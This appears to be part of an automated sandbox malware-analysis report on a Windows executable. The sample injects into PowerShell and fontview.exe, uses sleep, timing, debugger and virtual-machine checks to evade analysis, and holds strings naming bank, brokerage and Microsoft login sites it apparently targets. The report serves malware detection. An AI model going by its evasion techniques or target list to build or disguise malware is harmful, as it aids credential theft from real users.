    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: Yara matchFile source: Process Memory Space: Item-RQF-9456786.exe PID: 1628, type: MEMORYSTR
    Source: C:\Windows\SysWOW64\fontview.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
    Source: C:\Windows\SysWOW64\fontview.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
    Source: C:\Windows\SysWOW64\fontview.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
    Source: C:\Windows\SysWOW64\fontview.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
    Source: C:\Windows\SysWOW64\fontview.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
    Source: C:\Windows\SysWOW64\fontview.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
    Source: C:\Windows\SysWOW64\fontview.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
    Source: C:\Windows\SysWOW64\fontview.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeMemory allocated: B00000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeMemory allocated: 29A0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeMemory allocated: E60000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeMemory allocated: 89F0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeMemory allocated: 99F0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeMemory allocated: 9BF0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeMemory allocated: ABF0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E096E rdtsc 5_2_017E096E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5369Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1932Jump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeWindow / User API: threadDelayed 3672Jump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeWindow / User API: threadDelayed 6300Jump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeAPI coverage: 0.7 %
    Source: C:\Windows\SysWOW64\fontview.exeAPI coverage: 3.1 %
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe TID: 1576Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5824Thread sleep time: -5534023222112862s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4208Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6176Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exe TID: 6112Thread sleep count: 3672 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\fontview.exe TID: 6112Thread sleep time: -7344000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exe TID: 6112Thread sleep count: 6300 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\fontview.exe TID: 6112Thread sleep time: -12600000s >= -30000sJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe TID: 4024Thread sleep time: -75000s >= -30000sJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe TID: 4024Thread sleep count: 39 > 30Jump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe TID: 4024Thread sleep time: -58500s >= -30000sJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe TID: 4024Thread sleep count: 40 > 30Jump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe TID: 4024Thread sleep time: -40000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\fontview.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\fontview.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0301C700 FindFirstFileW,FindNextFileW,FindClose,10_2_0301C700
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: 645X-52.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
    Source: 645X-52.10.drBinary or memory string: discord.comVMware20,11696428655f
    Source: 645X-52.10.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
    Source: 645X-52.10.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
    Source: 645X-52.10.drBinary or memory string: global block list test formVMware20,11696428655
    Source: fontview.exe, 0000000A.00000002.4745738628.00000000080F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kofamerica.comVMware20,11696428655x
    Source: 645X-52.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
    Source: Item-RQF-9456786.exe, 00000000.00000002.2270851248.0000000000B8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
    Source: 645X-52.10.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
    Source: 645X-52.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
    Source: 645X-52.10.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
    Source: fontview.exe, 0000000A.00000002.4745738628.00000000080F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hange Transaction PasswordVMware20,11696428655
    Source: LiiDBuNLRIYu.exe, 0000000B.00000002.4741162500.00000000007DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
    Source: 645X-52.10.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
    Source: 645X-52.10.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
    Source: 645X-52.10.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
    Source: 645X-52.10.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
    Source: 645X-52.10.drBinary or memory string: outlook.office365.comVMware20,11696428655t
    Source: 645X-52.10.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
    Source: firefox.exe, 0000000C.00000002.2854413976.0000016E49A8D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: fontview.exe, 0000000A.00000002.4745738628.00000000080F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696428655^
    Source: 645X-52.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
    Source: 645X-52.10.drBinary or memory string: outlook.office.comVMware20,11696428655s
    Source: 645X-52.10.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
    Source: 645X-52.10.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
    Source: 645X-52.10.drBinary or memory string: AMC password management pageVMware20,11696428655
    Source: 645X-52.10.drBinary or memory string: tasks.office.comVMware20,11696428655o
    Source: 645X-52.10.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
    Source: 645X-52.10.drBinary or memory string: interactivebrokers.comVMware20,11696428655
    Source: 645X-52.10.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
    Source: 645X-52.10.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
    Source: 645X-52.10.drBinary or memory string: dev.azure.comVMware20,11696428655j
    Source: 645X-52.10.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
    Source: 645X-52.10.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
    Source: fontview.exe, 0000000A.00000002.4740849571.00000000032BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM&k
    Source: 645X-52.10.drBinary or memory string: bankofamerica.comVMware20,11696428655x
    Source: 645X-52.10.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
    Source: 645X-52.10.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E096E rdtsc 5_2_017E096E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_00417C23 LdrLoadDll,5_2_00417C23
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01844180 mov eax, dword ptr fs:[00000030h]5_2_01844180
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01844180 mov eax, dword ptr fs:[00000030h]5_2_01844180
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0185C188 mov eax, dword ptr fs:[00000030h]5_2_0185C188
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0185C188 mov eax, dword ptr fs:[00000030h]5_2_0185C188
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182019F mov eax, dword ptr fs:[00000030h]5_2_0182019F
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182019F mov eax, dword ptr fs:[00000030h]5_2_0182019F
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182019F mov eax, dword ptr fs:[00000030h]5_2_0182019F
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182019F mov eax, dword ptr fs:[00000030h]5_2_0182019F
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A6154 mov eax, dword ptr fs:[00000030h]5_2_017A6154
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A6154 mov eax, dword ptr fs:[00000030h]5_2_017A6154
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179C156 mov eax, dword ptr fs:[00000030h]5_2_0179C156
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018661C3 mov eax, dword ptr fs:[00000030h]5_2_018661C3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018661C3 mov eax, dword ptr fs:[00000030h]5_2_018661C3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181E1D0 mov eax, dword ptr fs:[00000030h]5_2_0181E1D0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181E1D0 mov eax, dword ptr fs:[00000030h]5_2_0181E1D0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181E1D0 mov ecx, dword ptr fs:[00000030h]5_2_0181E1D0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181E1D0 mov eax, dword ptr fs:[00000030h]5_2_0181E1D0
